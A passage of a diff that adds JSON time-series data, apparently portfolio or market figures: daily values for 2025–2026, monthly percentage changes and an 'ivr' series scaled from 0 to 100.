+ [ + "2025-06-20", + 15814.415799827515 + ], + [ + "2025-06-23", + 15977.0262118757 + ], + [ + "2025-06-24", + 16221.348696567804 + ], + [ + "2025-06-25", + 16262.815953332214 + ], + [ + "2025-06-26", + 16414.87913069725 + ], + [ + "2025-06-27", + 16471.07643191966 + ], + [ + "2025-06-30", + 16577.760173483508 + ], + [ + "2025-07-01", + 16438.01897931525 + ], + [ + "2025-07-02", + 16552.51603280008 + ], + [ + "2025-07-03", + 16715.397075586337 + ], + [ + "2025-07-07", + 16589.481982390407 + ], + [ + "2025-07-08", + 16598.79757106151 + ], + [ + "2025-07-09", + 16716.29917804658 + ], + [ + "2025-07-10", + 16692.259067993764 + ], + [ + "2025-07-11", + 16654.692944113554 + ], + [ + "2025-07-14", + 16715.098829466828 + ], + [ + "2025-07-15", + 16730.42168411299 + ], + [ + "2025-07-16", + 16747.552425730504 + ], + [ + "2025-07-17", + 16883.0850357679 + ], + [ + "2025-07-18", + 16866.858237636065 + ], + [ + "2025-07-21", + 16954.3087865424 + ], + [ + "2025-07-22", + 16866.558150491124 + ], + [ + "2025-07-23", + 16943.490921121174 + ], + [ + "2025-07-24", + 16979.5510862004 + ], + [ + "2025-07-25", + 17020.421850725794 + ], + [ + "2025-07-28", + 17073.61643947339 + ], + [ + "2025-07-29", + 17047.170109184775 + ], + [ + "2025-07-30", + 17070.00802963241 + ], + [ + "2025-07-31", + 16979.5510862004 + ], + [ + "2025-08-01", + 16645.077268297515 + ], + [ + "2025-08-04", + 16952.20449447697 + ], + [ + "2025-08-05", + 16837.107266702267 + ], + [ + "2025-08-06", + 17048.972473079837 + ], + [ + "2025-08-07", + 17106.670210026943 + ], + [ + "2025-08-08", + 17266.24661216802 + ], + [ + "2025-08-11", + 17215.15631548585 + ], + [ + "2025-08-12", + 17431.530193139217 + ], + [ + "2025-08-13", + 17440.24744854587 + ], + [ + "2025-08-14", + 17426.72327574391 + ], + [ + "2025-08-15", + 17350.09243328423 + ], + [ + "2025-08-18", + 17343.179382798065 + ], + [ + "2025-08-19", + 17107.874240657555 + ], + [ + "2025-08-20", + 17006.299344659383 + ], + [ + "2025-08-21", + 16927.564210134275 + ], + [ + "2025-08-22", + 17188.711826222665 + ], + [ + "2025-08-25", + 17139.129329366904 + ], + [ + "2025-08-26", + 17207.943177854748 + ], + [ + "2025-08-27", + 17234.39134916879 + ], + [ + "2025-08-28", + 17342.27728033782 + ], + [ + "2025-08-29", + 17141.531867551843 + ], + [ + "2025-09-02", + 16997.885858448524 + ], + [ + "2025-09-03", + 17131.614263565436 + ], + [ + "2025-09-04", + 17286.680153405287 + ], + [ + "2025-09-05", + 17311.624206943776 + ], + [ + "2025-09-08", + 17396.070202349867 + ], + [ + "2025-09-09", + 17445.354453086115 + ], + [ + "2025-09-10", + 17451.065313967098 + ], + [ + "2025-09-11", + 17552.64020996527 + ], + [ + "2025-09-12", + 17630.173154885193 + ], + [ + "2025-09-15", + 17781.032301619616 + ], + [ + "2025-09-16", + 17766.00585206753 + ], + [ + "2025-09-17", + 17730.54586127818 + ], + [ + "2025-09-18", + 17890.422350564197 + ], + [ + "2025-09-19", + 18011.528685339388 + ], + [ + "2025-09-22", + 18118.157196140364 + ], + [ + "2025-09-23", + 17997.811204867376 + ], + [ + "2025-09-24", + 17934.629053167064 + ], + [ + "2025-09-25", + 17857.307826171484 + ], + [ + "2025-09-26", + 17930.71687413029 + ], + [ + "2025-09-29", + 18013.756326108567 + ], + [ + "2025-09-30", + 18063.099489658547 + ], + [ + "2025-10-01", + 18149.747351477807 + ], + [ + "2025-10-02", + 18224.36227109265 + ], + [ + "2025-10-03", + 18147.643059412378 + ], + [ + "2025-10-06", + 18283.934171926554 + ], + [ + "2025-10-07", + 18187.657747113248 + ], + [ + "2025-10-08", + 18396.157559006475 + ], + [ + "2025-10-09", + 18373.894038492712 + ], + [ + "2025-10-10", + 17736.057891412824 + ], + [ + "2025-10-13", + 18112.440812183097 + ], + [ + "2025-10-14", + 17991.79473376517 + ], + [ + "2025-10-15", + 18118.759211455672 + ], + [ + "2025-10-16", + 18051.66672174401 + ], + [ + "2025-10-17", + 18170.206667071077 + ], + [ + "2025-10-20", + 18399.16579455758 + ], + [ + "2025-10-21", + 18394.353354085986 + ], + [ + "2025-10-22", + 18217.14176935983 + ], + [ + "2025-10-23", + 18370.283787626304 + ], + [ + "2025-10-24", + 18566.44688811932 + ], + [ + "2025-10-27", + 18897.100578256883 + ], + [ + "2025-10-28", + 19042.418238449798 + ], + [ + "2025-10-29", + 19128.16583883424 + ], + [ + "2025-10-30", + 18835.72263147706 + ], + [ + "2025-10-31", + 18926.586441528896 + ], + [ + "2025-11-03", + 19017.1446413595 + ], + [ + "2025-11-04", + 18631.13315759518 + ], + [ + "2025-11-05", + 18752.38493337927 + ], + [ + "2025-11-06", + 18403.077973594358 + ], + [ + "2025-11-07", + 18345.010190536006 + ], + [ + "2025-11-10", + 18750.878974578292 + ], + [ + "2025-11-11", + 18700.935636738435 + ], + [ + "2025-11-12", + 18686.19270510243 + ], + [ + "2025-11-13", + 18304.695415690196 + ], + [ + "2025-11-14", + 18318.534403840527 + ], + [ + "2025-11-17", + 18162.084062878013 + ], + [ + "2025-11-18", + 17940.945611414212 + ], + [ + "2025-11-19", + 18048.054629852173 + ], + [ + "2025-11-20", + 17620.824427756368 + ], + [ + "2025-11-21", + 17753.207043284627 + ], + [ + "2025-11-24", + 18207.213119220847 + ], + [ + "2025-11-25", + 18319.4383473262 + ], + [ + "2025-11-26", + 18481.303144075613 + ], + [ + "2025-11-28", + 18631.13315759518 + ], + [ + "2025-12-01", + 18568.553021210177 + ], + [ + "2025-12-02", + 18713.870681403092 + ], + [ + "2025-12-03", + 18759.603594086664 + ], + [ + "2025-12-04", + 18742.15435506992 + ], + [ + "2025-12-05", + 18818.573479605257 + ], + [ + "2025-12-08", + 18782.469129915735 + ], + [ + "2025-12-09", + 18805.634752889742 + ], + [ + "2025-12-10", + 18882.657733765816 + ], + [ + "2025-12-11", + 18821.58355618179 + ], + [ + "2025-12-12", + 18461.745930942583 + ], + [ + "2025-12-15", + 18369.07975699569 + ], + [ + "2025-12-16", + 18405.484193830154 + ], + [ + "2025-12-17", + 18064.301679263728 + ], + [ + "2025-12-18", + 18326.054992718284 + ], + [ + "2025-12-19", + 18564.944611369196 + ], + [ + "2025-12-22", + 18653.934257534234 + ], + [ + "2025-12-23", + 18741.296437219975 + ], + [ + "2025-12-24", + 18796.125856548588 + ], + [ + "2025-12-26", + 18794.919984892545 + ], + [ + "2025-12-29", + 18703.94203126411 + ], + [ + "2025-12-30", + 18660.560108053465 + ], + [ + "2025-12-31", + 18506.31899760584 + ], + [ + "2026-01-02", + 18470.470550450955 + ], + [ + "2026-01-05", + 18617.18002586825 + ], + [ + "2026-01-06", + 18780.760658317555 + ], + [ + "2026-01-07", + 18798.83768700561 + ], + [ + "2026-01-08", + 18691.89067880541 + ], + [ + "2026-01-09", + 18878.06621634571 + ], + [ + "2026-01-12", + 18893.731501721682 + ], + [ + "2026-01-13", + 18865.71477674207 + ], + [ + "2026-01-14", + 18664.17588199616 + ], + [ + "2026-01-15", + 18731.356740928415 + ], + [ + "2026-01-16", + 18715.691455552445 + ], + [ + "2026-01-20", + 18318.035485949247 + ], + [ + "2026-01-21", + 18565.666293337392 + ], + [ + "2026-01-22", + 18700.62818549178 + ], + [ + "2026-01-23", + 18759.67355305297 + ], + [ + "2026-01-26", + 18842.217769190825 + ], + [ + "2026-01-27", + 19013.028108500097 + ], + [ + "2026-01-28", + 19075.98933714892 + ], + [ + "2026-01-29", + 18961.81446311418 + ], + [ + "2026-01-30", + 18734.06673036001 + ], + [ + "2026-02-02", + 18862.702859140107 + ], + [ + "2026-02-03", + 18572.896000197357 + ], + [ + "2026-02-04", + 18248.446565755767 + ], + [ + "2026-02-05", + 17985.754329332387 + ], + [ + "2026-02-06", + 18365.935285562835 + ], + [ + "2026-02-09", + 18506.620925776206 + ], + [ + "2026-02-10", + 18420.76286386602 + ], + [ + "2026-02-11", + 18470.168622280587 + ], + [ + "2026-02-12", + 18094.50554245308 + ], + [ + "2026-02-13", + 18133.065820064985 + ], + [ + "2026-02-17", + 18114.386776061627 + ], + [ + "2026-02-18", + 18249.65059638638 + ], + [ + "2026-02-19", + 18179.75974802253 + ], + [ + "2026-02-20", + 18340.630391040246 + ], + [ + "2026-02-23", + 18117.700621833956 + ], + [ + "2026-02-24", + 18312.311737890264 + ], + [ + "2026-02-25", + 18577.71580477067 + ], + [ + "2026-02-26", + 18353.583845959194 + ], + [ + "2026-02-27", + 18294.838565542945 + ], + [ + "2026-03-02", + 18318.939429434922 + ], + [ + "2026-03-03", + 18122.82419560306 + ], + [ + "2026-03-04", + 18399.073743286124 + ], + [ + "2026-03-05", + 18343.640467616777 + ], + [ + "2026-03-06", + 18067.69284810408 + ], + [ + "2026-03-09", + 18308.997892117935 + ], + [ + "2026-03-10", + 18309.299820288303 + ], + [ + "2026-03-11", + 18306.88991800165 + ], + [ + "2026-03-12", + 17992.68210802198 + ], + [ + "2026-03-13", + 17886.037027992148 + ], + [ + "2026-03-16", + 18086.67197925238 + ], + [ + "2026-03-17", + 18174.939943449222 + ], + [ + "2026-03-18", + 17921.587229027522 + ], + [ + "2026-03-19", + 17864.94992272756 + ], + [ + "2026-03-20", + 17534.774899201555 + ], + [ + "2026-03-23", + 17736.056050387393 + ], + [ + "2026-03-24", + 17614.798751527014 + ], + [ + "2026-03-25", + 17730.626866397062 + ], + [ + "2026-03-26", + 17307.43403306721 + ], + [ + "2026-03-27", + 16969.303938662186 + ], + [ + "2026-03-30", + 16839.601856158657 + ], + [ + "2026-03-31", + 17409.68826744871 + ], + [ + "2026-04-01", + 17624.753176022004 + ], + [ + "2026-04-02", + 17644.962112156925 + ], + [ + "2026-04-06", + 17751.137730702347 + ], + [ + "2026-04-07", + 17753.85324321023 + ], + [ + "2026-04-08", + 18281.712054233663 + ], + [ + "2026-04-09", + 18405.381096406127 + ], + [ + "2026-04-10", + 18431.92500104248 + ], + [ + "2026-04-13", + 18622.557661146566 + ], + [ + "2026-04-14", + 18960.68775555159 + ], + [ + "2026-04-15", + 19226.126801915147 + ], + [ + "2026-04-16", + 19318.726698946593 + ], + [ + "2026-04-17", + 19571.495808307278 + ], + [ + "2026-04-20", + 19509.35935905068 + ], + [ + "2026-04-21", + 19435.158670157372 + ], + [ + "2026-04-22", + 19760.318740414587 + ], + [ + "2026-04-23", + 19649.015866049198 + ] + ], + "monthly_pct": [ + [ + "2021-05-31", + -0.03227813542020508 + ], + [ + "2021-06-30", + 0.6064490958604507 + ], + [ + "2021-07-31", + 0.24662697723030202 + ], + [ + "2021-08-31", + 0.2583862788740898 + ], + [ + "2021-09-30", + -1.0590963648558382 + ], + [ + "2021-10-31", + 0.7045623959368141 + ], + [ + "2021-11-30", + -0.1352392961090909 + ], + [ + "2021-12-31", + 1.818415878059887 + ], + [ + "2022-01-31", + -6.484474249294337 + ], + [ + "2022-02-28", + 1.5789538406677073 + ], + [ + "2022-03-31", + -0.05519692510769225 + ], + [ + "2022-04-30", + -5.603138186140266 + ], + [ + "2022-05-31", + 0.4998524501784951 + ], + [ + "2022-06-30", + 0.8009204363736533 + ], + [ + "2022-07-31", + 2.5613902323392335 + ], + [ + "2022-08-31", + -1.5448656236799918 + ], + [ + "2022-09-30", + 0.9781687937933103 + ], + [ + "2022-10-31", + 0.9794876100709171 + ], + [ + "2022-11-30", + 0.8015536970065407 + ], + [ + "2022-12-31", + -0.7122245677800065 + ], + [ + "2023-01-31", + 0.7484891811389449 + ], + [ + "2023-02-28", + -0.23793446554383202 + ], + [ + "2023-03-31", + 0.722956101557215 + ], + [ + "2023-04-30", + 0.22311251152478118 + ], + [ + "2023-05-31", + 0.2583862788740454 + ], + [ + "2023-06-30", + 0.24662697723027982 + ], + [ + "2023-07-31", + 0.2348690548344079 + ], + [ + "2023-08-31", + 0.2701469599276196 + ], + [ + "2023-09-30", + 0.2348690548344523 + ], + [ + "2023-10-31", + 0.32117152300110696 + ], + [ + "2023-11-30", + 0.5308221164620708 + ], + [ + "2023-12-31", + 0.2348690548344079 + ], + [ + "2024-01-31", + 0.348619651285631 + ], + [ + "2024-02-29", + 0.707450936965337 + ], + [ + "2024-03-31", + 0.8292673610754697 + ], + [ + "2024-04-30", + 0.6804642733803545 + ], + [ + "2024-05-31", + 0.8055354178848173 + ], + [ + "2024-06-30", + 0.33833782201233564 + ], + [ + "2024-07-31", + 0.9181723567591726 + ], + [ + "2024-08-31", + 3.4966264450803974 + ], + [ + "2024-09-30", + 1.3524709658320866 + ], + [ + "2024-10-31", + 0.6824093846593327 + ], + [ + "2024-11-30", + 0.7918728480769577 + ], + [ + "2024-12-31", + -0.6287404706507238 + ], + [ + "2025-01-31", + 3.096578340375933 + ], + [ + "2025-02-28", + -0.08221717376012405 + ], + [ + "2025-03-31", + -4.092541860447152 + ], + [ + "2025-04-30", + -1.3867140677627288 + ], + [ + "2025-05-31", + 2.54629294462283 + ], + [ + "2025-06-30", + 0.49171065706494765 + ], + [ + "2025-07-31", + 0.2583862788740898 + ], + [ + "2025-08-31", + 0.24662697723025762 + ], + [ + "2025-09-30", + 0.24662697723025762 + ], + [ + "2025-10-31", + 1.1575862270056136 + ], + [ + "2025-11-30", + 2.12766549292438 + ], + [ + "2025-12-31", + 1.4521264373150489 + ], + [ + "2026-01-31", + 0.2348690548344079 + ], + [ + "2026-02-28", + 1.064808635378145 + ], + [ + "2026-03-31", + 1.1341659427353656 + ], + [ + "2026-04-30", + 1.1546219894529308 + ] + ], + "ivr": [ + [ + "2021-04-26", + 50.0 + ], + [ + "2021-04-27", + 50.0 + ], + [ + "2021-04-28", + 50.0 + ], + [ + "2021-04-29", + 50.0 + ], + [ + "2021-04-30", + 50.0 + ], + [ + "2021-05-03", + 50.0 + ], + [ + "2021-05-04", + 50.0 + ], + [ + "2021-05-05", + 50.0 + ], + [ + "2021-05-06", + 50.0 + ], + [ + "2021-05-07", + 50.0 + ], + [ + "2021-05-10", + 50.0 + ], + [ + "2021-05-11", + 50.0 + ], + [ + "2021-05-12", + 50.0 + ], + [ + "2021-05-13", + 50.0 + ], + [ + "2021-05-14", + 50.0 + ], + [ + "2021-05-17", + 50.0 + ], + [ + "2021-05-18", + 50.0 + ], + [ + "2021-05-19", + 50.0 + ], + [ + "2021-05-20", + 50.0 + ], + [ + "2021-05-21", + 50.0 + ], + [ + "2021-05-24", + 50.0 + ], + [ + "2021-05-25", + 0.0 + ], + [ + "2021-05-26", + 100.0 + ], + [ + "2021-05-27", + 23.736849005146638 + ], + [ + "2021-05-28", + 0.0 + ], + [ + "2021-06-01", + 0.0 + ], + [ + "2021-06-02", + 0.0 + ], + [ + "2021-06-03", + 29.355236784208742 + ], + [ + "2021-06-04", + 95.6825091622464 + ], + [ + "2021-06-07", + 80.85535553444385 + ], + [ + "2021-06-08", + 0.0 + ], + [ + "2021-06-09", + 0.0 + ], + [ + "2021-06-10", + 0.0 + ], + [ + "2021-06-11", + 0.0 + ], + [ + "2021-06-14", + 0.0 + ], + [ + "2021-06-15", + 0.6660104064518915 + ], + [ + "2021-06-16", + 0.0 + ], + [ + "2021-06-17", + 5.6779206070768025 + ], + [ + "2021-06-18", + 0.0 + ], + [ + "2021-06-21", + 0.0 + ], + [ + "2021-06-22", + 0.0 + ], + [ + "2021-06-23", + 0.1569185391684184 + ], + [ + "2021-06-24", + 1.0450738069756003 + ], + [ + "2021-06-25", + 0.0 + ], + [ + "2021-06-28", + 5.2785153258034665 + ], + [ + "2021-06-29", + 2.740148821796858 + ], + [ + "2021-06-30", + 3.9921816696727217 + ], + [ + "2021-07-01", + 0.0 + ], + [ + "2021-07-02", + 0.0 + ], + [ + "2021-07-06", + 0.06096201455649441 + ], + [ + "2021-07-07", + 0.0 + ], + [ + "2021-07-08", + 4.739813049684592 + ], + [ + "2021-07-09", + 1.9801429028868893 + ], + [ + "2021-07-12", + 2.0550144083472195 + ], + [ + "2021-07-13", + 0.0 + ], + [ + "2021-07-14", + 0.0 + ], + [ + "2021-07-15", + 3.485944892603532 + ], + [ + "2021-07-16", + 3.952441977560456 + ], + [ + "2021-07-19", + 3.994518684695164 + ], + [ + "2021-07-20", + 7.958682204665106 + ], + [ + "2021-07-21", + 6.635806647127257 + ], + [ + "2021-07-22", + 7.933974006390229 + ], + [ + "2021-07-23", + 11.522329350293175 + ], + [ + "2021-07-26", + 10.845795221017056 + ], + [ + "2021-07-27", + 15.000975125708557 + ], + [ + "2021-07-28", + 14.974356551591969 + ], + [ + "2021-07-29", + 14.461123500770285 + ], + [ + "2021-07-30", + 16.698746731021714 + ], + [ + "2021-08-02", + 10.955562173815316 + ], + [ + "2021-08-03", + 11.610491002842469 + ], + [ + "2021-08-04", + 11.555640290160532 + ], + [ + "2021-08-05", + 10.263059856485139 + ], + [ + "2021-08-06", + 10.926043451969377 + ], + [ + "2021-08-09", + 10.351229717780537 + ], + [ + "2021-08-10", + 12.184160283124294 + ], + [ + "2021-08-11", + 12.397535093815213 + ], + [ + "2021-08-12", + 9.514276746093572 + ], + [ + "2021-08-13", + 4.413398733587209 + ], + [ + "2021-08-16", + 0.0 + ], + [ + "2021-08-17", + 0.899674287356122 + ], + [ + "2021-08-18", + 4.38230507918264 + ], + [ + "2021-08-19", + 2.724128323173684 + ], + [ + "2021-08-20", + 1.6623577431886503 + ], + [ + "2021-08-23", + 14.265559787392862 + ], + [ + "2021-08-24", + 6.37879638288013 + ], + [ + "2021-08-25", + 6.0773793927418005 + ], + [ + "2021-08-26", + 8.703466371201197 + ], + [ + "2021-08-27", + 10.769871304550813 + ], + [ + "2021-08-30", + 15.363665289069592 + ], + [ + "2021-08-31", + 14.991329902100814 + ], + [ + "2021-09-01", + 14.990801030539878 + ], + [ + "2021-09-02", + 14.023418950557923 + ], + [ + "2021-09-03", + 12.126655722622303 + ], + [ + "2021-09-07", + 12.137119541266372 + ], + [ + "2021-09-08", + 11.057986163258372 + ], + [ + "2021-09-09", + 11.969511243220355 + ], + [ + "2021-09-10", + 16.265915342507718 + ], + [ + "2021-09-13", + 16.19009648305971 + ], + [ + "2021-09-14", + 16.96826488676053 + ], + [ + "2021-09-15", + 13.523912410155022 + ], + [ + "2021-09-16", + 5.717291620810854 + ], + [ + "2021-09-17", + 15.80572699639638 + ], + [ + "2021-09-20", + 33.307001336576775 + ], + [ + "2021-09-21", + 21.82054481339026 + ], + [ + "2021-09-22", + 26.541542728435125 + ], + [ + "2021-09-23", + 30.96793752028985 + ], + [ + "2021-09-24", + 29.488683442826968 + ], + [ + "2021-09-27", + 27.5798899270759 + ], + [ + "2021-09-28", + 50.37242573827873 + ], + [ + "2021-09-29", + 50.25933639583408 + ], + [ + "2021-09-30", + 49.41325315778236 + ], + [ + "2021-10-01", + 52.342241109954855 + ], + [ + "2021-10-04", + 62.1198805343294 + ], + [ + "2021-10-05", + 70.7689256395335 + ], + [ + "2021-10-06", + 73.89903334633811 + ], + [ + "2021-10-07", + 78.22768626711863 + ], + [ + "2021-10-08", + 77.5679434634025 + ], + [ + "2021-10-11", + 78.3918690406707 + ], + [ + "2021-10-12", + 78.41828488807366 + ], + [ + "2021-10-13", + 78.69321281858439 + ], + [ + "2021-10-14", + 91.42928328474673 + ], + [ + "2021-10-15", + 89.49227820771225 + ], + [ + "2021-10-18", + 79.02574235451539 + ], + [ + "2021-10-19", + 80.25600982072037 + ], + [ + "2021-10-20", + 77.91762120430269 + ], + [ + "2021-10-21", + 76.41393829398756 + ], + [ + "2021-10-22", + 78.94563119582146 + ], + [ + "2021-10-25", + 79.42462921288364 + ], + [ + "2021-10-26", + 47.82685590148495 + ], + [ + "2021-10-27", + 46.845881245721216 + ], + [ + "2021-10-28", + 47.34281700625047 + ], + [ + "2021-10-29", + 47.156883327280966 + ], + [ + "2021-11-01", + 19.33187225914956 + ], + [ + "2021-11-02", + 15.577677628003517 + ], + [ + "2021-11-03", + 17.41244717522633 + ], + [ + "2021-11-04", + 19.656792740377977 + ], + [ + "2021-11-05", + 15.044903051546546 + ], + [ + "2021-11-08", + 8.497444920346101 + ], + [ + "2021-11-09", + 12.645196351971757 + ], + [ + "2021-11-10", + 30.90032259980403 + ], + [ + "2021-11-11", + 20.02350809774744 + ], + [ + "2021-11-12", + 22.345426284240773 + ], + [ + "2021-11-15", + 20.45982466538222 + ], + [ + "2021-11-16", + 20.27061009620316 + ], + [ + "2021-11-17", + 19.78190817663263 + ], + [ + "2021-11-18", + 21.99281251804568 + ], + [ + "2021-11-19", + 14.63752659214098 + ], + [ + "2021-11-22", + 23.94129195652213 + ], + [ + "2021-11-23", + 26.451941557092677 + ], + [ + "2021-11-24", + 26.47201430033008 + ], + [ + "2021-11-26", + 41.01684653988394 + ], + [ + "2021-11-29", + 55.69180368285232 + ], + [ + "2021-11-30", + 64.58664559578384 + ], + [ + "2021-12-01", + 74.52484430395312 + ], + [ + "2021-12-02", + 71.9743611681158 + ], + [ + "2021-12-03", + 73.93894814916334 + ], + [ + "2021-12-06", + 76.6738989700229 + ], + [ + "2021-12-07", + 100.0 + ], + [ + "2021-12-08", + 99.14194788514152 + ], + [ + "2021-12-09", + 98.96977258548468 + ], + [ + "2021-12-10", + 100.0 + ], + [ + "2021-12-13", + 100.0 + ], + [ + "2021-12-14", + 100.0 + ], + [ + "2021-12-15", + 100.0 + ], + [ + "2021-12-16", + 100.0 + ], + [ + "2021-12-17", + 97.79068831018807 + ], + [ + "2021-12-20", + 97.63435157028091 + ], + [ + "2021-12-21", + 100.0 + ], + [ + "2021-12-22", + 100.0 + ], + [ + "2021-12-23", + 100.0 + ], + [ + "2021-12-27", + 97.9779412342479 + ], + [ + "2021-12-28", + 92.47968882486448 + ], + [ + "2021-12-29", + 88.96180030772273 + ], + [ + "2021-12-30", + 83.75727182135086 + ], + [ + "2021-12-31", + 84.34355683375281 + ], + [ + "2022-01-03", + 79.61647535097288 + ], + [ + "2022-01-04", + 82.770948605202 + ], + [ + "2022-01-05", + 83.22752951350876 + ], + [ + "2022-01-06", + 82.56807131738518 + ], + [ + "2022-01-07", + 81.30494184602522 + ], + [ + "2022-01-10", + 78.9421374357763 + ], + [ + "2022-01-11", + 80.50313388103237 + ], + [ + "2022-01-12", + 79.24873288983608 + ], + [ + "2022-01-13", + 79.0842315933965 + ], + [ + "2022-01-14", + 69.80310614230767 + ], + [ + "2022-01-18", + 78.6889577347277 + ], + [ + "2022-01-19", + 79.18724228517509 + ], + [ + "2022-01-20", + 70.00654059180216 + ], + [ + "2022-01-21", + 75.01159925968243 + ], + [ + "2022-01-24", + 73.69606896038863 + ], + [ + "2022-01-25", + 70.14996253721502 + ], + [ + "2022-01-26", + 70.79995341880512 + ], + [ + "2022-01-27", + 69.90698020787605 + ], + [ + "2022-01-28", + 94.0576006221475 + ], + [ + "2022-01-31", + 100.0 + ], + [ + "2022-02-01", + 99.04215660177668 + ], + [ + "2022-02-02", + 99.80056668857205 + ], + [ + "2022-02-03", + 100.0 + ], + [ + "2022-02-04", + 100.0 + ], + [ + "2022-02-07", + 99.60111939204572 + ], + [ + "2022-02-08", + 100.0 + ], + [ + "2022-02-09", + 100.0 + ], + [ + "2022-02-10", + 100.0 + ], + [ + "2022-02-11", + 100.0 + ], + [ + "2022-02-14", + 99.4961774619791 + ], + [ + "2022-02-15", + 100.0 + ], + [ + "2022-02-16", + 99.19492483707046 + ], + [ + "2022-02-17", + 100.0 + ], + [ + "2022-02-18", + 95.32388965471608 + ], + [ + "2022-02-22", + 95.57595829951823 + ], + [ + "2022-02-23", + 95.90913576891124 + ], + [ + "2022-02-24", + 100.0 + ], + [ + "2022-02-25", + 100.0 + ], + [ + "2022-02-28", + 93.27378236115636 + ], + [ + "2022-03-01", + 85.97647919295659 + ], + [ + "2022-03-02", + 88.00645098437614 + ], + [ + "2022-03-03", + 88.01672873689934 + ], + [ + "2022-03-04", + 78.04382811633059 + ], + [ + "2022-03-07", + 85.39910959028282 + ], + [ + "2022-03-08", + 85.33150648624701 + ], + [ + "2022-03-09", + 95.31522854821458 + ], + [ + "2022-03-10", + 91.15317628339461 + ], + [ + "2022-03-11", + 90.79890295540598 + ], + [ + "2022-03-14", + 87.04025927317741 + ], + [ + "2022-03-15", + 95.63082328853262 + ], + [ + "2022-03-16", + 100.0 + ], + [ + "2022-03-17", + 100.0 + ], + [ + "2022-03-18", + 97.20037756888088 + ], + [ + "2022-03-21", + 96.22684528146401 + ], + [ + "2022-03-22", + 97.23421175950173 + ], + [ + "2022-03-23", + 93.63975120804561 + ], + [ + "2022-03-24", + 89.93867346936393 + ], + [ + "2022-03-25", + 88.75254060894495 + ], + [ + "2022-03-28", + 89.90203656216188 + ], + [ + "2022-03-29", + 88.64272799025163 + ], + [ + "2022-03-30", + 88.9295442592611 + ], + [ + "2022-03-31", + 88.89607203794995 + ], + [ + "2022-04-01", + 86.8013207657214 + ], + [ + "2022-04-04", + 74.83691618099515 + ], + [ + "2022-04-05", + 80.23944899911278 + ], + [ + "2022-04-06", + 77.9212506054996 + ], + [ + "2022-04-07", + 76.3870159112495 + ], + [ + "2022-04-08", + 74.00333149798115 + ], + [ + "2022-04-11", + 75.71152347128869 + ], + [ + "2022-04-12", + 69.57587970909105 + ], + [ + "2022-04-13", + 61.08247285641605 + ], + [ + "2022-04-14", + 64.6720836486122 + ], + [ + "2022-04-18", + 60.3161886878275 + ], + [ + "2022-04-19", + 64.94150594303919 + ], + [ + "2022-04-20", + 62.63681774369303 + ], + [ + "2022-04-21", + 64.08700504626117 + ], + [ + "2022-04-22", + 63.015142743418174 + ], + [ + "2022-04-25", + 65.45241146486951 + ], + [ + "2022-04-26", + 70.60188489517937 + ], + [ + "2022-04-27", + 65.73027974778542 + ], + [ + "2022-04-28", + 80.16496749365382 + ], + [ + "2022-04-29", + 90.21542145026609 + ], + [ + "2022-05-02", + 93.51437075482832 + ], + [ + "2022-05-03", + 88.56520895652015 + ], + [ + "2022-05-04", + 97.21841254100015 + ], + [ + "2022-05-05", + 100.0 + ], + [ + "2022-05-06", + 99.77599948091522 + ], + [ + "2022-05-09", + 100.0 + ], + [ + "2022-05-10", + 100.0 + ], + [ + "2022-05-11", + 100.0 + ], + [ + "2022-05-12", + 96.24074579380552 + ], + [ + "2022-05-13", + 100.0 + ], + [ + "2022-05-16", + 99.89001904475974 + ], + [ + "2022-05-17", + 100.0 + ], + [ + "2022-05-18", + 100.0 + ], + [ + "2022-05-19", + 99.39481269107105 + ], + [ + "2022-05-20", + 97.80863786585793 + ], + [ + "2022-05-23", + 98.47076384787623 + ], + [ + "2022-05-24", + 95.19959656079558 + ], + [ + "2022-05-25", + 96.45545449769335 + ], + [ + "2022-05-26", + 94.28938340298004 + ], + [ + "2022-05-27", + 92.23896045435177 + ], + [ + "2022-05-31", + 91.06840084037171 + ], + [ + "2022-06-01", + 91.20644331339014 + ], + [ + "2022-06-02", + 89.55506700438086 + ], + [ + "2022-06-03", + 81.91129566261031 + ], + [ + "2022-06-06", + 81.44390595559933 + ], + [ + "2022-06-07", + 73.76044830236992 + ], + [ + "2022-06-08", + 73.65337264387423 + ], + [ + "2022-06-09", + 72.89498514751561 + ], + [ + "2022-06-10", + 79.28598047925864 + ], + [ + "2022-06-13", + 81.37925150365609 + ], + [ + "2022-06-14", + 81.37332278061406 + ], + [ + "2022-06-15", + 81.06602310355001 + ], + [ + "2022-06-16", + 77.9541765083744 + ], + [ + "2022-06-17", + 79.00214428535395 + ], + [ + "2022-06-21", + 82.39454823788898 + ], + [ + "2022-06-22", + 80.89561867766994 + ], + [ + "2022-06-23", + 80.15655453899217 + ], + [ + "2022-06-24", + 84.8801947631399 + ], + [ + "2022-06-27", + 81.60096068481556 + ], + [ + "2022-06-28", + 79.47481100718136 + ], + [ + "2022-06-29", + 79.56481621419553 + ], + [ + "2022-06-30", + 79.78738396265219 + ], + [ + "2022-07-01", + 75.41046580171779 + ], + [ + "2022-07-05", + 75.187795042993 + ], + [ + "2022-07-06", + 75.36786576603822 + ], + [ + "2022-07-07", + 77.45540908342778 + ], + [ + "2022-07-08", + 77.40649344635017 + ], + [ + "2022-07-11", + 76.10799233018632 + ], + [ + "2022-07-12", + 70.3994751625935 + ], + [ + "2022-07-13", + 58.08474201837136 + ], + [ + "2022-07-14", + 58.09683947320556 + ], + [ + "2022-07-15", + 56.6301162552074 + ], + [ + "2022-07-18", + 44.9998178015573 + ], + [ + "2022-07-19", + 48.963445659922606 + ], + [ + "2022-07-20", + 47.01540980746395 + ], + [ + "2022-07-21", + 47.50256864916696 + ], + [ + "2022-07-22", + 49.806662056400505 + ], + [ + "2022-07-25", + 42.54571312447446 + ], + [ + "2022-07-26", + 45.17300327835551 + ], + [ + "2022-07-27", + 48.61088093525336 + ], + [ + "2022-07-28", + 48.721032319956436 + ], + [ + "2022-07-29", + 47.9444298233888 + ], + [ + "2022-08-01", + 48.212638635553155 + ], + [ + "2022-08-02", + 47.67151451718149 + ], + [ + "2022-08-03", + 50.78794039307313 + ], + [ + "2022-08-04", + 49.20252327776054 + ], + [ + "2022-08-05", + 50.1900287907739 + ], + [ + "2022-08-08", + 46.00024415821712 + ], + [ + "2022-08-09", + 46.388001169536416 + ], + [ + "2022-08-10", + 49.117533816676875 + ], + [ + "2022-08-11", + 49.93634799816404 + ], + [ + "2022-08-12", + 50.13863337107408 + ], + [ + "2022-08-15", + 48.76190809428131 + ], + [ + "2022-08-16", + 45.4711875112901 + ], + [ + "2022-08-17", + 46.21897477631084 + ], + [ + "2022-08-18", + 45.474082285084954 + ], + [ + "2022-08-19", + 46.122722095699345 + ], + [ + "2022-08-22", + 50.814297872794455 + ], + [ + "2022-08-23", + 47.342033624527616 + 